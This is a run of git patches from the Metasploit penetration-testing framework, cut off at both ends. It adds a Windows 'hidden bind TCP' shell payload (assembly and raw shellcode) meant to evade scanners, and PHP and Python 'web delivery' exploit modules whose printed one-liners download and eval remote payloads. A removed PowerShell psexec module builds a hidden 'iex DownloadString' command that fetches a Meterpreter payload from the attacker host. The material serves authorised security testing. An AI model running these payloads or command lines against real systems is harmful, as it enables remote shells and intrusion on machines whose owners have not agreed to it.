findSendDelete($tempdir, $prefix){ +function findSendDelete($tempdir, $prefix, $one=true){ if($dh = opendir($tempdir)){ while(($file = readdir($dh)) !== false){ if(strpos($file, $prefix) !== 0){ @@ -18,7 +18,9 @@ function findSendDelete($tempdir, $prefix){ } readfile($tempdir."/".$file); unlink($tempdir."/".$file); - break; + if($one){ + break; + } } } } @@ -37,7 +39,7 @@ if($url === "/control"){ fwrite($f, $postdata); fclose($f); }else{ - findSendDelete($tempdir, "up_"); + findSendDelete($tempdir, "up_", false); } }else if($_SERVER['REQUEST_METHOD'] === 'POST'){ //get data @@ -56,6 +58,8 @@ if($url === "/control"){ $urlen = strlen($url); fwrite($f, pack('V', $urlen)); fwrite($f, $url); + $postdatalen = strlen($postdata); + fwrite($f, pack('V', $postdatalen)); fwrite($f, $postdata); fclose($f); //Initial query will be a GET and have a 12345 in it diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 2fb807e801..96478245cc 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -104,42 +104,44 @@ module ReverseHopHttp next end - # validate response + # validate responses, handle each message down received = res.body - next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC + until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC - # good response - delay = 0 # we're talking, speed up - urlen = received.slice!(0,4).unpack('V')[0] - urlpath = received.slice!(0,urlen) + # good response + delay = 0 # we're talking, speed up + urlen = received.slice!(0,4).unpack('V')[0] + urlpath = received.slice!(0,urlen) + datalen = received.slice!(0,4).unpack('V')[0] - # do not want handlers to change while we dispatch this - hop_http.lock.lock - #received is now the binary contents of the message - if hop_http.handlers.include? urlpath - pack = Rex::Proto::Http::Packet.new - pack.body = received - hop_http.current_url = urlpath - hop_http.handlers[urlpath].call(hop_http, pack) - hop_http.lock.unlock - elsif !closed_handlers.include? urlpath - hop_http.lock.unlock - #New session! - conn_id = urlpath.gsub("/","") - # Short-circuit the payload's handle_connection processing for create_session - # We are the dispatcher since we need to handle the comms to the hop - create_session(hop_http, { - :passive_dispatcher => self, - :conn_id => conn_id, - :url => uri.to_s + conn_id + "/\x00", - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :ssl => false, - }) - # send new stage to hop so next inbound session will get a unique ID. - hop_http.send_new_stage - else - hop_http.lock.unlock + # do not want handlers to change while we dispatch this + hop_http.lock.lock + #received now starts with the binary contents of the message + if hop_http.handlers.include? urlpath + pack = Rex::Proto::Http::Packet.new + pack.body = received.slice!(0,datalen) + hop_http.current_url = urlpath + hop_http.handlers[urlpath].call(hop_http, pack) + hop_http.lock.unlock + elsif !closed_handlers.include? urlpath + hop_http.lock.unlock + #New session! + conn_id = urlpath.gsub("/","") + # Short-circuit the payload's handle_connection processing for create_session + # We are the dispatcher since we need to handle the comms to the hop + create_session(hop_http, { + :passive_dispatcher => self, + :conn_id => conn_id, + :url => uri.to_s + conn_id + "/\x00", + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :ssl => false, + }) + # send new stage to hop so next inbound session will get a unique ID. + hop_http.send_new_stage + else + hop_http.lock.unlock + end end end hop_http.monitor_thread = nil #make sure we're out From 81e89eadba0830ba1b88667ccbda6b2f7d725c5e Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 10:21:05 -0800 Subject: [PATCH 028/853] Rename modules/exploits/multi/http/myBB_GetTypeDB to modules/auxiliary/analyse/myBB_GetTypeDB.rb On the advice of "wvu-r7" moved module. --- .../http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/{exploits/multi/http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} (100%) diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/auxiliary/analyse/myBB_GetTypeDB.rb similarity index 100% rename from modules/exploits/multi/http/myBB_GetTypeDB rename to modules/auxiliary/analyse/myBB_GetTypeDB.rb From 396ff8adaaa71eddde168f784fe851e0089190dc Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 11:33:57 -0800 Subject: [PATCH 029/853] Rename modules/auxiliary/analyse/myBB_GetTypeDB.rb to modules/auxiliary/analyze/myBB_GetTypeDB.rb Sorry again :( --- modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb (100%) diff --git a/modules/auxiliary/analyse/myBB_GetTypeDB.rb b/modules/auxiliary/analyze/myBB_GetTypeDB.rb similarity index 100% rename from modules/auxiliary/analyse/myBB_GetTypeDB.rb rename to modules/auxiliary/analyze/myBB_GetTypeDB.rb From b4a22aa25d0635ab9204f0f4ae1886e7da034876 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 20 Feb 2014 16:19:40 +0100 Subject: [PATCH 030/853] hidden bind shell payload --- .../x86/src/block/block_hidden_bind_tcp.asm | 90 +++++++ .../single/single_shell_hidden_bind_tcp.asm | 20 ++ lib/msf/core/handler/bind_hidden_tcp.rb | 231 ++++++++++++++++++ .../singles/windows/shell_hidden_bind_tcp.rb | 74 ++++++ 4 files changed, 415 insertions(+) create mode 100644 external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm create mode 100644 lib/msf/core/handler/bind_hidden_tcp.rb create mode 100644 modules/payloads/singles/windows/shell_hidden_bind_tcp.rb diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm new file mode 100644 index 0000000000..fa8f31681a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm @@ -0,0 +1,90 @@ +;-----------------------------------------------------------------------------; +; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com) +; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (February 2014) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the newly connected clients socket +; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + +bind_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. + push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + xchg edi, eax ; save the socket for later, don't care about the value of eax after this + + xor ebx, ebx ; Clear EBX + push ebx ; bind to 0.0.0.0 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save a pointer to sockaddr_in struct + push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) + push esi ; pointer to the sockaddr_in struct + push edi ; socket + push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) + call ebp ; bind( s, &sockaddr_in, 16 ); + + ; Hidden ACL Support ---------- + + push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter + push esp ; optval: pointer to the buffer in which the value for the requested option is specified + push 0x3002 ; level at which the option is defined: SOL_SOCKET + push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT + push edi ; socket descriptor + push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" ) + call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 ); + + push ebx ; backlog + push edi ; socket + push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) + call ebp ; listen( s, 0 ); + +condition: + push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function) + call wsaaccept ; push the start of the condition function on the stack + mov eax, DWORD [esp+4] ; + mov eax, DWORD [eax+4] ; + mov eax, DWORD [eax+4] ; get the client IP returned in the stack + sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed + jz return ; if equal returns CF_ACCEPT + xor eax, eax ; If not equal, the condition function returns CF_REJECT + inc eax +return: + retn 0x20 ; some stack alignment needed to return to mswsock + +wsaaccept: + push ebx ; length of the sockaddr = nul + push ebx ; struct sockaddr = nul + push edi ; socket descriptor + push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" ) + call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0) + cmp eax, -1 ; if error jump to condition function to wait for another connection + jz condition + + push edi ; push the listening socket to close + xchg edi, eax ; replace the listening socket with the new connected socket for further comms + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm new file mode 100644 index 0000000000..cb2a14a38a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 341 bytes +; Build: >build.py single_shell_bind_tcp +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. +%include "./src/block/block_hidden_bind_tcp.asm" + ; By here we will have performed the bind_tcp connection and EDI will be out socket. +%include "./src/block/block_shell.asm" + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" diff --git a/lib/msf/core/handler/bind_hidden_tcp.rb b/lib/msf/core/handler/bind_hidden_tcp.rb new file mode 100644 index 0000000000..59a59af8ca --- /dev/null +++ b/lib/msf/core/handler/bind_hidden_tcp.rb @@ -0,0 +1,231 @@ +# -*- coding: binary -*- +module Msf +module Handler + +### +# +# This module implements the Bind Hidden TCP handler. This means that +# it will attempt to connect to a remote host on a given port for a period of +# time (typically the duration of an exploit) to see if a the payload has +# started listening. This can tend to be rather verbose in terms of traffic +# and in general it is preferable to use reverse payloads. +# +### +module BindHiddenTcp + + include Msf::Handler + + # + # Returns the handler specific string representation, in this case + # 'bind_hidden_tcp'. + # + def self.handler_type + return "bind_hidden_tcp" + end + + # + # Returns the connection oriented general handler type, in this case bind. + # + def self.general_handler_type + "bind" + end + + # + # Initializes a bind handler and adds the options common to all bind + # payloads, such as local port. + # + def initialize(info = {}) + super + + register_options( + [ + Opt::LPORT(4444), + OptAddress.new('RHOST', [false, 'The target address', '']), + OptAddress.new('AHOST', [true, 'IP address allowed', '192.168.1.33']), + ], Msf::Handler::BindHiddenTcp) + + self.conn_threads = [] + self.listener_threads = [] + self.listener_pairs = {} + end + + # + # Kills off the connection threads if there are any hanging around. + # + def cleanup_handler + # Kill any remaining handle_connection threads that might + # be hanging around + conn_threads.each { |thr| + thr.kill + } + end + + # + # Starts a new connecting thread + # + def add_handler(opts={}) + + # Merge the updated datastore values + opts.each_pair do |k,v| + datastore[k] = v + end + + # Start a new handler + start_handler + end + + # + # Starts monitoring for an outbound connection to become established. + # + def start_handler + + # Maximum number of seconds to run the handler + ctimeout = 150 + + if (exploit_config and exploit_config['active_timeout']) + ctimeout = exploit_config['active_timeout'].to_i + end + + # Take a copy of the datastore options + + ahost = datastore['AHOST'] + rhost = datastore['RHOST'] + lport = datastore['LPORT'] + + # Ignore this if one of the required options is missing + return if not ahost + return if not rhost + return if not lport + + # Only try the same host/port combination once + phash = rhost + ':' + lport.to_s + return if self.listener_pairs[phash] + self.listener_pairs[phash] = true + + # Start a new handling thread + self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { + client = nil + + print_status("Started Hidden bind handler") + + if (rhost == nil) + raise ArgumentError, + "RHOST is not defined; bind stager cannot function.", + caller + end + + stime = Time.now.to_i + + while (stime + ctimeout > Time.now.to_i) + begin + client = Rex::Socket::Tcp.create( + 'PeerHost' => rhost, + 'PeerPort' => lport.to_i, + 'Proxies' => datastore['Proxies'], + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + rescue Rex::ConnectionRefused + # Connection refused is a-okay + rescue ::Exception + wlog("Exception caught in bind handler: #{$!.class} #{$!}") + end + + break if client + + # Wait a second before trying again + Rex::ThreadSafe.sleep(0.5) + end + + # Valid client connection? + if (client) + # Increment the has connection counter + self.pending_connections += 1 + + # Start a new thread and pass the client connection + # as the input and output pipe. Client's are expected + # to implement the Stream interface. + conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy| + begin + handle_connection(wrap_aes_socket(client_copy)) + rescue + elog("Exception raised from BindHiddenTcp.handle_connection: #{$!}") + end + } + else + wlog("No connection received before the handler completed") + end + } + end + + def wrap_aes_socket(sock) + if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" + return sock + end + + socks = Rex::Socket::tcp_socket_pair() + socks[0].extend(Rex::Socket::Tcp) + socks[1].extend(Rex::Socket::Tcp) + + m = OpenSSL::Digest::Digest.new('md5') + m.reset + key = m.digest(datastore["AESPassword"] || "") + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c1.encrypt + c1.key=key + sock.put([0].pack('N')) + sock.put(c1.iv=c1.random_iv) + buf1 = socks[0].read(4096) + while buf1 and buf1 != "" + sock.put(c1.update(buf1)) + buf1 = socks[0].read(4096) + end + sock.close() + } + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c2.decrypt + c2.key=key + iv="" + while iv.length < 16 + iv << sock.read(16-iv.length) + end + c2.iv = iv + buf2 = sock.read(4096) + while buf2 and buf2 != "" + socks[0].put(c2.update(buf2)) + buf2 = sock.read(4096) + end + socks[0].close() + } + + return socks[1] + end + + # + # Nothing to speak of. + # + def stop_handler + # Stop the listener threads + self.listener_threads.each do |t| + t.kill + end + self.listener_threads = [] + self.listener_pairs = {} + end + +protected + + attr_accessor :conn_threads # :nodoc: + attr_accessor :listener_threads # :nodoc: + attr_accessor :listener_pairs # :nodoc: +end + +end +end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb new file mode 100644 index 0000000000..e63628d4bc --- /dev/null +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -0,0 +1,74 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_hidden_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', + 'Description' => 'Listen for a connection from certain IP and spawn a command shell. + The shellcode will reply with a RST packet if the connection is not + comming from the IP defined in AHOST. This way the socket will appear + as "closed" helping us to keep our shellcode hidden from scanning tools.', + 'Author' => + [ + 'vlad902', # original payload module (single_shell_bind_tcp) + 'sd', # original payload module (single_shell_bind_tcp) + 'Borja Merino ' # Add Hidden ACL functionality + ], + 'License' => MSF_LICENSE, + 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindHiddenTcp, + 'Session' => Msf::Sessions::CommandShell, + 'Payload' => + { + 'Offsets' => + { + 'LPORT' => [ 200, 'n' ], + 'AHOST' => [ 262, 'ADDR' ], + 'EXITFUNC' => [ 364, 'V' ], + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + + "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" + + "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" + + "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" + + "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" + + "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" + + "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" + + "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + + "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" + + "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" + + "\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" + + "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" + + "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" + + "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" + + "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" + + "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + + "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" + + "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" + + "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + + "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" + + "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" + + "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + } + )) + end + +end From 45d554e6d966f0601e823f3207e519b68a6b3471 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 20 Feb 2014 12:01:04 -0500 Subject: [PATCH 031/853] Delete powershell_psexec.rb --- .../windows/powershell/powershell_psexec.rb | 159 ------------------ 1 file changed, 159 deletions(-) delete mode 100644 modules/exploits/windows/powershell/powershell_psexec.rb diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb deleted file mode 100644 index 6f13facd90..0000000000 --- a/modules/exploits/windows/powershell/powershell_psexec.rb +++ /dev/null @@ -1,159 +0,0 @@ -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ManualRanking - - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB::Psexec - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::EXE - include Msf::Exploit::Remote::HttpServer - - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Authenticated User Powershell PSEXEC', - 'Description' => %q{ - This module uses a valid windows user account to pull a meterpreter payload via psexec (thanks to hdm and r3dy) and powershell. It then - executes it within a powershell process. This module uses a slightly modified technique that was first detailed by - @obscuresec using Powersploit. A custom payload option is avaliable via the LPATH variable. - }, - 'Author' => - [ - 'Andrew Smith "jakx" ', - ], - 'License' => MSF_LICENSE, - 'Version' => '$$', - 'Privileged' => true, - 'DefaultOptions' => - { - 'WfsDelay' => 15, - 'EXITFUNC' => 'process', - 'Payload' => 'windows/meterpreter/reverse_tcp' - }, - 'References' => - [ - [ 'URL', 'http://obscuresecurity.blogspot.com/2013/03/powersploit-metasploit-shells.html' ], - [ 'URL', 'https://github.com/mattifestation/PowerSploit' ] - ], - 'Payload' => - { - 'Space' => 2048, - 'DisableNops' => true, - 'StackAdjustment' => -3500 - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - )) - - register_options( - [ - OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]), - OptString.new('LHOST', [ true, "Host serving meterpreter payload", '' ]), - OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86). This options forces 32-bit powershell if machine is 64-bit", 'x64' ]), - OptString.new('LPATH', [ false, "Set this variable to the path of a local file if you want to specify a custom payload, such as powersploit", "" ]) - ], self.class ) - - end - - def peer - - return "#{rhost}:#{rport}" - - end - - def exploit - start_service( - {'Uri' => { - 'Proc' => Proc.new { |cli, req| - on_request_uri(cli, req) - }, - 'Path' => resource_uri - }}) - - - print_status("Connecting to the server...") - connect() - - #Authenticate to target machine - print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") - smb_login() - - if (not simple.client.auth_user) - print_line(" ") - print_error( - "FAILED! The remote host has only provided us with Guest privileges. " + - "Please make sure that the correct username and password have been provided. " + - "Windows XP systems that are not part of a domain will only provide Guest privileges " + - "to network logins by default." - ) - print_line(" ") - disconnect - return - end - - resource=get_resource[1..-1] - payload="#{resource}" - - #Determine if LPATH or MSF payload needs to be used - if (datastore['LPATH'] == "") - print_status("No custom payload specified, using metasploit payload") - elsif File.exists?("#{datastore['LPATH']}") - print_status("Good, your custom payload exists, using #{datastore['LPATH']}") - else - print_error("Specified file #{datastore['LPATH']} does not exist...exiting...") - return - end - - #Define x64 and x32 specific commands - print_status("Pulling payload from #{datastore['LHOST']} and executing..") - - cmd="cmd.exe /c powershell.exe start-process powershell.exe -Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << - "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" - - cmd64="cmd.exe /c powershell.exe start-process \"$env:WINDIR\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" " << - "-Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << - "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" - - begin - if (datastore['ARCH'] == "x86") - result=psexec(cmd) - elsif (datastore['ARCH'] == "x64") - result2=psexec(cmd64) - else - print_error("You did not specify a valid target machine architecture!") - return - end - - if (result) - print_status("x86 architecture command sent. Waiting for session...") - end - if (result2) - print_status("x64 architecture command sent. Waiting for session...") - end - rescue Rex::Proto::SMB::Exceptions::Error => exec_error - print_error("#{peer} - Unable to execute command: #{exec_error}") - return - end - - #Give time for payload to execute - select(nil, nil, nil, 25) - - handler - disconnect - end - - def on_request_uri(cli, request) - print_status("handling request for #{request.uri}") - if (datastore['LPATH'] != "") - script = File.read("#{datastore['LPATH']}") - else - script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded) - end - send_response(cli, script, { 'Content-Type' => 'text/plain' }) - end -end From 1834784b93afd2aa41c59fcc31f8777fb0334d93 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 20 Feb 2014 13:41:18 -0500 Subject: [PATCH 032/853] Added php_web_delivery --- .../exploits/multi/php/php_web_delivery.rb | 60 +++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 modules/exploits/multi/php/php_web_delivery.rb diff --git a/modules/exploits/multi/php/php_web_delivery.rb b/modules/exploits/multi/php/php_web_delivery.rb new file mode 100644 index 0000000000..da17371cd9 --- /dev/null +++ b/modules/exploits/multi/php/php_web_delivery.rb @@ -0,0 +1,60 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PHP Payload Web Delivery', + 'Description' => %q{ + This module quickly fires up a web server that serves a PHP payload. + The provided command will start PHP and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so is less likely to trigger AV solutions. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrew Smith "jakx_" ', + 'Ben Campbell ' #Idea for module structure + ], + 'DefaultOptions' => + { + 'Payload' => 'php/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + ], + 'Platform' => 'php', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'N/A')) + end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + data = %Q|#{payload.encoded} ?>| + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + def primer + url = get_uri() + print_status("Run the following command on the target machine:") + print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") + print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") + end +end + From b5bc3dd4fcad33ed2b4b799cce429ef1728057a0 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 20 Feb 2014 21:53:00 -0500 Subject: [PATCH 033/853] Added py_web_delivery --- .../exploits/multi/python/py_web_delivery.rb | 60 +++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 modules/exploits/multi/python/py_web_delivery.rb diff --git a/modules/exploits/multi/python/py_web_delivery.rb b/modules/exploits/multi/python/py_web_delivery.rb new file mode 100644 index 0000000000..a3af5380ce --- /dev/null +++ b/modules/exploits/multi/python/py_web_delivery.rb @@ -0,0 +1,60 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Python Payload Web Delivery', + 'Description' => %q{ + This module quickly fires up a web server that serves a Python payload. + The provided command will start Python and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrew Smith "jakx_" ', + 'Ben Campbell ' #Idea for module structure + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + ], + 'Platform' => 'py', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'N/A')) + end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + data = %Q|#{payload.encoded} | + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + def primer + url = get_uri() + print_status("Run the following command on the target machine:") + print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + end +end From ef51de3826fa3f0be0b069bce3d2bc75f39ac52e Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 21 Feb 2014 09:21:08 -0500 Subject: [PATCH 034/853] Updating References --- modules/exploits/multi/php/php_web_delivery.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/php/php_web_delivery.rb b/modules/exploits/multi/php/php_web_delivery.rb index da17371cd9..e7c237890a 100644 --- a/modules/exploits/multi/php/php_web_delivery.rb +++ b/modules/exploits/multi/php/php_web_delivery.rb @@ -33,7 +33,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + [ 'URL', 